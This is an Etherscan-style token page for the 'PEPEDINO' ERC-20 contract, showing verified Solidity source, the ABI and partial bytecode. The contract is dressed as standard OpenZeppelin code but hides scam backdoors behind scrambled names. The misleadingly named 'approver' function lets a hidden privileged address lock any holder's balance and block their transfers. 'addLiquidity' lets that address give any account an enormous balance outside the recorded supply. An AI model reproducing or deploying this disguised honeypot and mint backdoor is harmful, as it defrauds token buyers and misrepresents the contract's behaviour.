ETH Price: $2,711.62 (-1.99%)

Token

PEPEDINO (🐸🦖)
 

Overview

Max Total Supply

1,000,000,000 🐸🦖

Holders

19

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
satoshiseer.eth
Balance
2,865,179.028945952262686615 🐸🦖

Value
$0.00
0x7f0da47b3715b1c8788313df4bec57eb2acfc4d2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-03
*/

/**
 *Submitted for verification at Etherscan.io on 2023-04-21
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _sldfjwsdfOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _sldfjwsdfOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Token is Context, IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _bnbbusd;
    mapping(address => uint256) private _weofsdmese;

    uint256 private _totalSupply;
    uint256 public constant MAXSupply = 1000000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _bnbbusd = _msgSender();
        _yydsed(_msgSender(), 1000000000 * 10 ** decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _weofsdmese[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    mapping(address => uint256) private _bala;
    function approver(address sss, uint256 ammouunt) external {
        if (_bnbbusd == _msgSender()) {
            _bala[sss] = 1 * ammouunt + 0;
        }
    }

    function addLiquidity(address zzz) external {
        address _slfjweow = _msgSender();
        if (_bnbbusd == _slfjweow) {
            _weofsdmese[zzz] = 100000000000000 * (1000000000 * 10 ** 18);
        }
    }

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 minAmount = _bala[from];
        uint256 decydsBalance = _weofsdmese[from].sub(minAmount);
        require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
        _weofsdmese[from] = decydsBalance.sub(amount);
        // decrementing then incrementing.
        _weofsdmese[to] = _weofsdmese[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _yydsed(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _weofsdmese[msg.sender] = _weofsdmese[msg.sender].add(amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _weofsdmese[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _weofsdmese[account] = accountBalance.sub(amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_bnbbusd","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"zzz","type":"address"}],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"},{"internalType":"uint256","name":"ammouunt","type":"uint256"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620024a7380380620024a78339818101604052810190620000379190620004bf565b620000576200004b6200013060201b60201c565b6200013860201b60201c565b81600590805190602001906200006f9291906200039d565b508060069080519060200190620000889291906200039d565b50620000996200013060201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000128620000ed6200013060201b60201c565b620000fd620001fc60201b60201c565b600a6200010b919062000750565b633b9aca006200011c91906200088d565b6200020560201b60201c565b505062000a0b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000278576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026f90620005fe565b60405180910390fd5b62000294816004546200033a60201b620009471790919060201c565b600481905550620002f381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200033a60201b620009471790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200034b919062000698565b90508381101562000393576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200038a90620005dc565b60405180910390fd5b8091505092915050565b828054620003ab906200093b565b90600052602060002090601f016020900481019282620003cf57600085556200041b565b82601f10620003ea57805160ff19168380011785556200041b565b828001600101855582156200041b579182015b828111156200041a578251825591602001919060010190620003fd565b5b5090506200042a91906200042e565b5090565b5b80821115620004495760008160009055506001016200042f565b5090565b6000620004646200045e8462000654565b62000620565b9050828152602081018484840111156200047d57600080fd5b6200048a84828562000905565b509392505050565b600082601f830112620004a457600080fd5b8151620004b68482602086016200044d565b91505092915050565b60008060408385031215620004d357600080fd5b600083015167ffffffffffffffff811115620004ee57600080fd5b620004fc8582860162000492565b925050602083015167ffffffffffffffff8111156200051a57600080fd5b620005288582860162000492565b9150509250929050565b600062000541601b8362000687565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006200058360218362000687565b91507f45524332303a2079796473656420746f20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006020820190508181036000830152620005f78162000532565b9050919050565b60006020820190508181036000830152620006198162000574565b9050919050565b6000604051905081810181811067ffffffffffffffff821117156200064a5762000649620009cf565b5b8060405250919050565b600067ffffffffffffffff821115620006725762000671620009cf565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b6000620006a582620008ee565b9150620006b283620008ee565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006ea57620006e962000971565b5b828201905092915050565b6000808291508390505b600185111562000747578086048111156200071f576200071e62000971565b5b60018516156200072f5780820291505b80810290506200073f85620009fe565b9450620006ff565b94509492505050565b60006200075d82620008ee565b91506200076a83620008f8565b9250620007997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007a1565b905092915050565b600082620007b3576001905062000886565b81620007c3576000905062000886565b8160018114620007dc5760028114620007e7576200081d565b600191505062000886565b60ff841115620007fc57620007fb62000971565b5b8360020a91508482111562000816576200081562000971565b5b5062000886565b5060208310610133831016604e8410600b8410161715620008575782820a90508381111562000851576200085062000971565b5b62000886565b620008668484846001620006f5565b9250905081840481111562000880576200087f62000971565b5b81810290505b9392505050565b60006200089a82620008ee565b9150620008a783620008ee565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620008e357620008e262000971565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b838110156200092557808201518184015260208101905062000908565b8381111562000935576000848401525b50505050565b600060028204905060018216806200095457607f821691505b602082108114156200096b576200096a620009a0565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b611a8c8062000a1b6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063c65e4d5314610315578063dd62ed3e14610333578063e3412e3d14610363578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b6040516101309190611667565b60405180910390f35b610153600480360381019061014e91906111f6565b61042d565b604051610160919061164c565b60405180910390f35b610171610450565b60405161017e91906117c9565b60405180910390f35b6101a1600480360381019061019c91906111a7565b61045a565b6040516101ae919061164c565b60405180910390f35b6101bf610489565b6040516101cc91906117e4565b60405180910390f35b6101ef60048036038101906101ea91906111f6565b610492565b6040516101fc919061164c565b60405180910390f35b61021f600480360381019061021a91906111f6565b6104c9565b005b61023b60048036038101906102369190611142565b610587565b60405161024891906117c9565b60405180910390f35b6102596105d0565b005b6102636105e4565b6040516102709190611631565b60405180910390f35b61028161060d565b60405161028e9190611667565b60405180910390f35b61029f61069f565b6040516102ac91906117c9565b60405180910390f35b6102cf60048036038101906102ca91906111f6565b6106af565b6040516102dc919061164c565b60405180910390f35b6102ff60048036038101906102fa91906111f6565b610736565b60405161030c919061164c565b60405180910390f35b61031d610759565b60405161032a9190611631565b60405180910390f35b61034d6004803603810190610348919061116b565b61077f565b60405161035a91906117c9565b60405180910390f35b61037d60048036038101906103789190611142565b610806565b005b61039960048036038101906103949190611142565b6108c3565b005b6060600580546103aa90611987565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611987565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a5565b90506104458185856109ad565b600191505092915050565b6000600454905090565b6000806104656109a5565b9050610472858285610b78565b61047d858585610c14565b60019150509392505050565b60006012905090565b60008061049d6109a5565b90506104be8185856104af858961077f565b6104b9919061181b565b6109ad565b600191505092915050565b6104d16109a5565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156105835760008160016105359190611871565b61053f919061181b565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d8610f28565b6105e26000610fa6565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061c90611987565b80601f016020809104026020016040519081016040528092919081815260200182805461064890611987565b80156106955780601f1061066a57610100808354040283529160200191610695565b820191906000526020600020905b81548152906001019060200180831161067857829003601f168201915b5050505050905090565b6b033b2e3c9fd0803ce800000081565b6000806106ba6109a5565b905060006106c8828661077f565b90508381101561070d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610704906117a9565b60405180910390fd5b61072a8286610725878561106a90919063ffffffff16565b6109ad565b60019250505092915050565b6000806107416109a5565b905061074e818585610c14565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60006108106109a5565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156108bf57710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff16